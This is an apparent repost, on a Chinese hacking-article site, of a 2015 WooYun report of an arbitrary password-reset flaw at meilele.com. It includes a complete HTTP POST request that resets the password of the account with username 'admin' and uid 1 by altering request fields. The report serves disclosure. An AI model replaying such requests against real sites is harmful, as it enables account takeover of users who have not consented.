记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华
«联想某站从注入到GETSHELL...
光大证券交易系统资金账号可被穷举攻击... »

美乐乐任意账号密码重置漏洞

2015-03-03 18:30

1.重置密码时候,泄露用户uid还有邮箱以及手机号码,请加*处理

2.任意账号密码重置漏洞:随便提交个账号找回密码,然后获得重置密码的页面,修改POST中的username或者uid都可以达到重置密码的目的

code 区域
POST /solr_api/Order/personCenter.do HTTP/1.1

Host: www.meilele.com

Proxy-Connection: keep-alive

Content-Length: 127

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://www.meilele.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://www.meilele.com/user/?act=get_password&uid=1&code=666113ec404d63eab04b3e23396e3bd6&type=5&username=wooyun

Accept-Encoding: gzip,deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: ***



username=admin&uid=1&url=%2Fuser%2F%3Fact%3Dget_password&act=get_password&newPassword=密码&confirmPassword=密码



QQ图片20150116194816.jpg

漏洞证明:

QQ图片20150116194816.jpg

修复方案:

限制


知识来源: www.wooyun.org/bugs/wooyun-2015-092300

阅读:225270 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“美乐乐任意账号密码重置漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

随机推荐 🤖

标签云 ☁